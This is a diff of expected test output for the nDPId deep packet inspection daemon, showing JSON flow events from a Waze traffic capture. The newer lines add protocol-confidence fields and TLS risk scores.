-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}}
+00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00563{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00727{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00724{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00585{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00910{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00621{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00564{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00704{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
